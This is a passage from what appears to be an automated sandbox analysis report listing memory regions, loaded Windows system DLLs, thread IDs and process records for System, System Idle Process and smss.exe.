region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 36256 start_va = 0x2b20000 end_va = 0x331ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 36257 start_va = 0x3320000 end_va = 0x42effff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 36258 start_va = 0x6e4f0000 end_va = 0x6e4f9fff entry_point = 0x6e4f0000 region_type = mapped_file name = "apphlpdm.dll" filename = "\\Windows\\System32\\Apphlpdm.dll" (normalized: "c:\\windows\\system32\\apphlpdm.dll") Region: id = 36259 start_va = 0x6e540000 end_va = 0x6e551fff entry_point = 0x6e540000 region_type = mapped_file name = "portabledeviceconnectapi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll") Region: id = 36260 start_va = 0x6e670000 end_va = 0x6e6f8fff entry_point = 0x6e670000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 36261 start_va = 0x6e900000 end_va = 0x6e949fff entry_point = 0x6e900000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 36262 start_va = 0x6eb70000 end_va = 0x6ebd6fff entry_point = 0x6eb70000 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 36263 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 36264 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = 
"\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 36265 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 36266 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 36267 start_va = 0x6f290000 end_va = 0x6f2f0fff entry_point = 0x6f290000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 36268 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 36269 start_va = 0x6fb90000 end_va = 0x6fba4fff entry_point = 0x6fb90000 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll") Region: id = 36270 start_va = 0x6fbc0000 end_va = 0x6fcddfff entry_point = 0x6fbc0000 region_type = mapped_file name = "sysmain.dll" filename = "\\Windows\\System32\\sysmain.dll" (normalized: "c:\\windows\\system32\\sysmain.dll") Region: id = 36271 start_va = 0x6fff0000 end_va = 0x70004fff entry_point = 0x6fff0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 36272 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 36273 start_va = 0x724e0000 end_va = 0x72504fff 
entry_point = 0x724e0000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 36274 start_va = 0x725f0000 end_va = 0x72604fff entry_point = 0x725f0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 36275 start_va = 0x72610000 end_va = 0x72661fff entry_point = 0x72610000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 36276 start_va = 0x72670000 end_va = 0x72698fff entry_point = 0x72670000 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 36277 start_va = 0x726a0000 end_va = 0x72760fff entry_point = 0x726a0000 region_type = mapped_file name = "rasdlg.dll" filename = "\\Windows\\System32\\rasdlg.dll" (normalized: "c:\\windows\\system32\\rasdlg.dll") Region: id = 36278 start_va = 0x72770000 end_va = 0x727b6fff entry_point = 0x72770000 region_type = mapped_file name = "netman.dll" filename = "\\Windows\\System32\\netman.dll" (normalized: "c:\\windows\\system32\\netman.dll") Region: id = 36279 start_va = 0x729e0000 end_va = 0x72c44fff entry_point = 0x729e0000 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 36280 start_va = 0x73390000 end_va = 0x7339cfff entry_point = 0x73390000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 36281 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") 
Region: id = 36282 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 36283 start_va = 0x73800000 end_va = 0x7380afff entry_point = 0x73800000 region_type = mapped_file name = "uxsms.dll" filename = "\\Windows\\System32\\uxsms.dll" (normalized: "c:\\windows\\system32\\uxsms.dll") Region: id = 36284 start_va = 0x73870000 end_va = 0x73879fff entry_point = 0x73870000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 36285 start_va = 0x73880000 end_va = 0x73888fff entry_point = 0x73880000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 36286 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 36287 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 36288 start_va = 0x739a0000 end_va = 0x739d4fff entry_point = 0x739a0000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 36289 start_va = 0x739e0000 end_va = 0x73a5cfff entry_point = 0x739e0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 36290 start_va = 0x73a60000 end_va = 0x73a84fff entry_point = 0x73a60000 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" 
(normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 36291 start_va = 0x73a90000 end_va = 0x73b17fff entry_point = 0x73a90000 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 36292 start_va = 0x73b40000 end_va = 0x73b46fff entry_point = 0x73b40000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 36293 start_va = 0x73b50000 end_va = 0x73b74fff entry_point = 0x73b50000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 36294 start_va = 0x73b80000 end_va = 0x73bf9fff entry_point = 0x73b80000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 36295 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 36296 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 36297 start_va = 0x73ed0000 end_va = 0x73f08fff entry_point = 0x73ed0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 36298 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 36299 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = 
mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 36300 start_va = 0x749e0000 end_va = 0x749eafff entry_point = 0x749e0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 36301 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 36302 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 36303 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 36304 start_va = 0x74bd0000 end_va = 0x74bddfff entry_point = 0x74bd0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 36305 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36306 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 36307 start_va = 0x74fe0000 end_va = 0x74ffafff entry_point = 0x74fe0000 
region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 36308 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 36309 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 36310 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 36311 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 36312 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 36313 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 36314 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 36315 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 
36316 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 36317 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36318 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 36319 start_va = 0x75650000 end_va = 0x7567cfff entry_point = 0x75650000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 36320 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36321 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 36322 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 36323 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 36324 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = 
"\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 36325 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36326 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36327 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 36328 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 36329 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36330 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 36331 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36332 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36333 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 
region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 36334 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 36335 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36336 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 36337 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36338 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 36339 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36340 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36341 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36342 
start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36343 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 36344 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 36345 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 36346 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 36347 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 36348 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 36349 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 36350 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 36351 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36352 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 36353 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 36354 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 36355 start_va = 
0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 36356 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 36357 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 36358 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 36359 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 36360 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36361 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36362 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36363 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 915 os_tid = 0x48c Thread: id = 916 os_tid = 0x274 Thread: id = 917 os_tid = 0x6e8 Thread: id = 918 os_tid = 0x7b0 Thread: id = 919 os_tid = 0x668 Thread: id = 920 os_tid = 0x420 Thread: id = 921 os_tid = 0x3fc Thread: id = 922 os_tid = 0x3e0 Thread: id = 923 os_tid = 0x3d4 Thread: id = 924 os_tid = 0x3d0 Thread: id = 925 os_tid = 0x3c0 Thread: id = 926 os_tid = 0x3bc Thread: id = 927 os_tid = 0x384 Thread: id = 928 os_tid = 0x380 Thread: id = 929 os_tid = 0x36c Thread: id = 930 os_tid = 0x368 Thread: id = 931 os_tid = 0x350 Thread: id = 932 os_tid = 0x338 Thread: id = 933 os_tid = 0x334 Thread: id = 938 os_tid = 0xec4 Thread: id = 947 os_tid = 
0xff4 Process: id = "657" image_name = "System" filename = "" page_root = "0x185000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36412 start_va = 0x10000 end_va = 0x32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Thread: id = 953 os_tid = 0x8 Thread: id = 954 os_tid = 0x14 Thread: id = 955 os_tid = 0x10 Thread: id = 956 os_tid = 0xc Thread: id = 957 os_tid = 0x18 Thread: id = 958 os_tid = 0x1c Thread: id = 959 os_tid = 0x20 Thread: id = 960 os_tid = 0x24 Thread: id = 961 os_tid = 0x28 Thread: id = 962 os_tid = 0x2c Thread: id = 963 os_tid = 0x30 Thread: id = 964 os_tid = 0x34 Thread: id = 965 os_tid = 0x38 Thread: id = 966 os_tid = 0x3c Thread: id = 967 os_tid = 0x40 Thread: id = 968 os_tid = 0x44 Thread: id = 969 os_tid = 0x48 Thread: id = 970 os_tid = 0x74 Thread: id = 971 os_tid = 0x4c Thread: id = 972 os_tid = 0x50 Thread: id = 973 os_tid = 0x54 Thread: id = 974 os_tid = 0x58 Thread: id = 975 os_tid = 0x5c Thread: id = 976 os_tid = 0x60 Thread: id = 977 os_tid = 0x64 Thread: id = 978 os_tid = 0x68 Thread: id = 979 os_tid = 0x6c Thread: id = 980 os_tid = 0x70 Thread: id = 981 os_tid = 0x78 Thread: id = 982 os_tid = 0x7c Thread: id = 983 os_tid = 0x80 Thread: id = 984 os_tid = 0x84 Thread: id = 985 os_tid = 0x88 Thread: id = 986 os_tid = 0x8c Thread: id = 987 os_tid = 0x90 Thread: id = 988 os_tid = 0x94 Thread: id = 989 os_tid = 0x98 Thread: id = 990 os_tid = 0x9c Thread: id = 991 os_tid = 0xa0 Thread: id = 992 os_tid = 0xa4 Thread: id = 993 os_tid = 0xa8 Thread: id = 994 os_tid = 0xac Thread: id = 995 os_tid = 0xb0 Thread: id = 996 os_tid = 0xb4 Thread: id = 997 os_tid = 0xb8 Thread: id = 998 os_tid = 0xbc Thread: id = 999 
os_tid = 0xc0 Thread: id = 1000 os_tid = 0xc4 Thread: id = 1001 os_tid = 0xc8 Thread: id = 1002 os_tid = 0xcc Thread: id = 1004 os_tid = 0xd0 Thread: id = 1005 os_tid = 0xd4 Thread: id = 1006 os_tid = 0xd8 Thread: id = 1007 os_tid = 0xdc Thread: id = 1011 os_tid = 0xf4 Thread: id = 1012 os_tid = 0xf8 Thread: id = 1013 os_tid = 0xfc Thread: id = 1014 os_tid = 0x100 Thread: id = 1015 os_tid = 0x104 Thread: id = 1016 os_tid = 0x108 Thread: id = 1017 os_tid = 0x10c Thread: id = 1018 os_tid = 0x110 Thread: id = 1019 os_tid = 0x114 Thread: id = 1020 os_tid = 0x118 Thread: id = 1021 os_tid = 0x11c Thread: id = 1022 os_tid = 0x120 Thread: id = 1026 os_tid = 0x138 Thread: id = 1027 os_tid = 0x13c Thread: id = 1028 os_tid = 0x140 Thread: id = 1029 os_tid = 0x144 Thread: id = 1049 os_tid = 0x198 Thread: id = 1098 os_tid = 0x278 Thread: id = 1127 os_tid = 0x2f4 Thread: id = 1175 os_tid = 0x3c4 Thread: id = 1176 os_tid = 0x3c8 Thread: id = 1218 os_tid = 0x47c Process: id = "658" image_name = "System Idle Process" filename = "" page_root = "0x185000" os_pid = "0x0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 1003 os_tid = 0x0 Process: id = "659" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x7f1d1020" os_pid = "0xe0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "657" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36445 start_va = 0x0 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x (null)" 
filename = "" Region: id = 36446 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 36447 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 36448 start_va = 0x479e0000 end_va = 0x479f2fff entry_point = 0x479e0000 region_type = mapped_file name = "smss.exe" filename = "\\Windows\\System32\\smss.exe" (normalized: "c:\\windows\\system32\\smss.exe") Region: id = 36449 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36450 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36451 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36452 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36453 start_va = 